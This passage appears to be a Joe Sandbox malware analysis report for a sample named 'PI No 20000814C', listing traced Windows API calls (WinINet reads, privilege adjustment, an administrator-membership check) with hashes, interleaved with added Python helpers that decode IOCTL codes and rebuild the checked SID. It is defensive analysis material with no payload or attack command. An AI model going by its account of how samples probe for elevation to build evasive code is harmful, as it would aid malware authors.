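def decode_ioctl(code):
    """Split a 32-bit control code into its fields and name it if known."""
    code &= 0xFFFFFFFF
    device_type = code >> 16
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    name = next(
        (n for n, fields in KNOWN_IOCTLS.items() if ctl_code(*fields) == code),
        None,
    )
    return {
        "code": code,
        "device_type": device_type,
        "device_type_name": DEVICE_TYPES.get(device_type, "unknown"),
        "function": function,
        # Function numbers 0x800 and up are reserved for third-party drivers.
        "custom": function >= 0x800,
        "method": METHODS[method],
        "access": ACCESS[access],
        "name": name,
    }


if __name__ == "__main__":
    # Control code taken from the DeviceIoControl reference in the report.
    for key, value in decode_ioctl(0x0004D02C).items():
        shown = f"{value:#x}" if type(value) is int else value
        print(f"{key:17}: {shown}")
```

Extend KNOWN_IOCTLS with whatever codes your own triage keeps hitting; because names resolve through ctl_code(), a mistyped entry simply fails to match rather than mislabelling a call.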
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00F012D8
                                    • GetClientRect.USER32(?,?), ref: 00F3B84B
                                    • GetCursorPos.USER32(?), ref: 00F3B855
                                    • ScreenToClient.USER32(?,?), ref: 00F3B860
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 66467549bc52b6d1e655102c78ee05226ac4a351ff6fe10314481be62b4a514c
                                    • Instruction ID: 4922a664179e0d6b930e8b1d5625ea263bd8d33525d47b1fbdd3509ac36f2a08
                                    • Opcode Fuzzy Hash: 66467549bc52b6d1e655102c78ee05226ac4a351ff6fe10314481be62b4a514c
                                    • Instruction Fuzzy Hash: 86112536A0001DEFCB00EFA8D8899FE77B8FB05300F400456F901E7291D734AA55BBA5
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F5EB19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 62359b7b967a81c376e9f86c318100bc7795550edaad947242c3507ec5c8291e
                                    • Instruction ID: 83bff0300a2da12814497a456411d903b2544fcbc8043f0e25a42e366fa4a36d
                                    • Opcode Fuzzy Hash: 62359b7b967a81c376e9f86c318100bc7795550edaad947242c3507ec5c8291e
                                    • Instruction Fuzzy Hash: C6324775A007059FC728CF19C481A6AB7F1FF48320B15C56EE99ADB3A1EB70E945DB40
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00F726D5
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F7270C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 7534303c3dd6d8788dd0559561ec5a2761a1448b117e2326f4ebea80d053fb9a
                                    • Instruction ID: 78b7172baffd377ee82c6bfc0fd2ab29ebc9572c992777c1ec796a9eb5bcc0e0
                                    • Opcode Fuzzy Hash: 7534303c3dd6d8788dd0559561ec5a2761a1448b117e2326f4ebea80d053fb9a
                                    • Instruction Fuzzy Hash: 1F41D672900209BFEB60DE54DD85FBFB7BCEB40724F10806FF609A6140EA759E41B656
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6B5AE
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F6B608
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F6B655
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: fb68fa5568c5ad1b44a9ec1728476fbe125d6948fbb1f2c9eada24450674c1c5
                                    • Instruction ID: 1f4904caa5e83ac75860e0c05e247025e6aa323925451d43527b4b4b14599b11
                                    • Opcode Fuzzy Hash: fb68fa5568c5ad1b44a9ec1728476fbe125d6948fbb1f2c9eada24450674c1c5
                                    • Instruction Fuzzy Hash: 7B218E35A00508EFCB00EFA5DC84AEDBBB8FF48310F0480A9E805EB351DB35A955EB50
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                    • GetLastError.KERNEL32 ref: 00F58D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: a13f4d0600c4bff6eb111c58b6bd87a65f2ca1e23ff35160f301a0f21220f561
                                    • Instruction ID: 0fc5a978f78766979e14723b7c63d3b5782f7bd4bbd7807983aa074c046d3c4d
                                    • Opcode Fuzzy Hash: a13f4d0600c4bff6eb111c58b6bd87a65f2ca1e23ff35160f301a0f21220f561
                                    • Instruction Fuzzy Hash: 7F118FB2814209AFD728DF54EC85DABB7F9FB44751B20852EF85693241EF30AC459B60
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F64C2C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F64C43
                                    • FreeSid.ADVAPI32(?), ref: 00F64C53
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
                                    • Instruction ID: 3d8c8769bee754d40f3c5eaaf8b76585bcd3eea968b36e2a06b509a2689990f8
                                    • Opcode Fuzzy Hash: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
                                    • Instruction Fuzzy Hash: A8F03775A1130CBFDB04DFE09C89ABEBBB8EB08311F1044A9A901E2281E6746A189B50
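The AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple above is the standard "is the caller an administrator" test: sub-authority count 2 with RIDs 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS) yields S-1-5-32-544, BUILTIN\Administrators, when the identifier authority is SECURITY_NT_AUTHORITY. The authority is passed by pointer and shows only as "?" in the trace, so that value is assumed rather than read from the report. CheckTokenMembership with a NULL token handle (the first 00000000 argument) examines the calling thread's impersonation token, or the process token if none; under UAC the filtered token of an administrator carries this SID as deny-only, so the check reports FALSE unless the process is already elevated. The code below is an added example that rebuilds the SID from the visible arguments; it is not part of the Joe Sandbox report.

```python
"""Reconstruct the SID that AllocateAndInitializeSid builds from the
arguments visible in the report, and name it.

Added example; not part of the Joe Sandbox report. The identifier
authority is passed by pointer and shows only as "?" in the call trace,
so SECURITY_NT_AUTHORITY (5) is assumed here, which is what the standard
"is the caller in BUILTIN\\Administrators" check passes.
"""

import struct

SECURITY_NT_AUTHORITY = 5             # assumed; not visible in the trace
SECURITY_BUILTIN_DOMAIN_RID = 0x20    # the 00000020 argument
DOMAIN_ALIAS_RID_ADMINS = 0x220       # the 00000220 argument
SID_MAX_SUB_AUTHORITIES = 15

WELL_KNOWN = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
}


def allocate_and_initialize_sid(authority, count, *subauthorities):
    """Mirror the Win32 argument order (authority, nSubAuthorityCount,
    nSubAuthority0..7) and return the binary SID: revision 1, one byte
    of sub-authority count, a 6-byte big-endian authority, then the
    sub-authorities as little-endian DWORDs. Arguments beyond `count`
    are ignored, as the API ignores them."""
    if not 1 <= count <= SID_MAX_SUB_AUTHORITIES:
        raise ValueError("sub-authority count must be 1..15")
    if len(subauthorities) < count:
        raise ValueError("fewer sub-authorities than count")
    used = subauthorities[:count]
    return (
        struct.pack("<BB", 1, count)
        + authority.to_bytes(6, "big")
        + struct.pack("<%dI" % count, *used)
    )


def sid_to_string(sid):
    """Render a binary SID in S-R-A-S... form, as ConvertSidToStringSid does."""
    revision, count = struct.unpack_from("<BB", sid, 0)
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def describe_sid_call(authority, count, *subauthorities):
    """Return (string SID, well-known account name or None) for one
    AllocateAndInitializeSid invocation."""
    text = sid_to_string(allocate_and_initialize_sid(authority, count, *subauthorities))
    return text, WELL_KNOWN.get(text)


if __name__ == "__main__":
    # Arguments as listed in the report: count 2, RIDs 0x20 and 0x220,
    # the remaining six sub-authority slots zero.
    print(describe_sid_call(SECURITY_NT_AUTHORITY, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0))
```

Feed any other AllocateAndInitializeSid call from a trace into describe_sid_call() in the same argument order to see which group a sample is probing for.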
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c794b4c7aa39bc5fb2ceabcefafde85cf9f049fc338abd89877530dc77a7e9c
                                    • Instruction ID: 0bef2d735a1b674342828fd70eec822c814575499c28afa73610949ba5bfe432
                                    • Opcode Fuzzy Hash: 7c794b4c7aa39bc5fb2ceabcefafde85cf9f049fc338abd89877530dc77a7e9c
                                    • Instruction Fuzzy Hash: 93229C75E00219CFDB24DF54C880BAABBB1FF04310F148969EC56AB391E774A985FB91
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetParent.USER32(?), ref: 00F3BA0A
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00F019B3,?,?,?,00000006,?), ref: 00F3BA84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: dbd4fa16e18ff1ad468ec4bc81b6b66355a8a1846c7e4a003f58d97f19cf6c8c
                                    • Instruction ID: 8bf24fe7155cf8b74e5232c715b41105d4aa8215bf8bbb3952839fbcbd43dd0d
                                    • Opcode Fuzzy Hash: dbd4fa16e18ff1ad468ec4bc81b6b66355a8a1846c7e4a003f58d97f19cf6c8c
                                    • Instruction Fuzzy Hash: 5C218234A04508AFCF248F68CD99EA93B96AF49334F584254FA159B2E2CB319D51BB50
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F6C966
                                    • FindClose.KERNEL32(00000000), ref: 00F6C996
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 99dcc5fb9d8e23c80e91e27c9e8d324046367bf1b06b6d15db1bd6f0ea16c8f2
                                    • Instruction ID: 50b3fac73b3f85db9ec20fe3730d8eef0e5f5998b06372adc20d25ef8faba5c9
                                    • Opcode Fuzzy Hash: 99dcc5fb9d8e23c80e91e27c9e8d324046367bf1b06b6d15db1bd6f0ea16c8f2
                                    • Instruction Fuzzy Hash: AB118E326142049FDB10EF29C845A2AF7E9EF84320F00851EF8AAD7291DB74AC04EB81
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F3BB8A,?,?,?), ref: 00F8C8E1
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F8C8C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 06c6612cda52af52668d09f3ad7a7e8d11aa6a13e12026c2bb5aef19c51e9d16
                                    • Instruction ID: 126f983fd90320a4c980d2290d9fc6ec118f7efa84cae7e0b4eb248d52d1597a
                                    • Opcode Fuzzy Hash: 06c6612cda52af52668d09f3ad7a7e8d11aa6a13e12026c2bb5aef19c51e9d16
                                    • Instruction Fuzzy Hash: 7401D831240204AFDB216F14CC49FB63BA6FF85324F140528F9514B2E1CB315815FBB1
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 00F8CC51
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F3BC66,?,?,?,?,?), ref: 00F8CC7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: bc9087c01eacea136e0a5a46fa68208db71a12ff4784e557a598786ede0366a2
                                    • Instruction ID: 31543615490042cd59ec6344ac34ade61dbffb4ead5a9dafd89480653d0555e9
                                    • Opcode Fuzzy Hash: bc9087c01eacea136e0a5a46fa68208db71a12ff4784e557a598786ede0366a2
                                    • Instruction Fuzzy Hash: 27F0677241021CBFEB048F85DC09DFE7BB8EB08321F00006AF801A2161C371AA24EBA0
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F7977D,?,00F8FB84,?), ref: 00F6A302
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F7977D,?,00F8FB84,?), ref: 00F6A314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: fbe05d49353b3009ad1ad769570ee0be8e626cffc1570233a8163dcf8083eeb2
                                    • Instruction ID: 310d65d0704975cbdca49df341a480fa4fa1950248db62be73b774ccc6af3d7b
                                    • Opcode Fuzzy Hash: fbe05d49353b3009ad1ad769570ee0be8e626cffc1570233a8163dcf8083eeb2
                                    • Instruction Fuzzy Hash: A9F0E23150432DABDB10AFA4CC49FEA736CBF08361F004165B808D6281D6309944EBE1
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F8CD74
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F3BBE5,?,?,?,?), ref: 00F8CDA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58851), ref: 00F58728
                                    • CloseHandle.KERNEL32(?,?,00F58851), ref: 00F5873A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00F94178,00F28F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00F2A39A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F2A3A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • __time64.LIBCMT ref: 00F68B25
                                      • Part of subcall function 00F2543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F691F8,00000000,?,?,?,?,00F693A9,00000000,?), ref: 00F25443
                                      • Part of subcall function 00F2543A: __aulldiv.LIBCMT ref: 00F25463
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F8DB46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
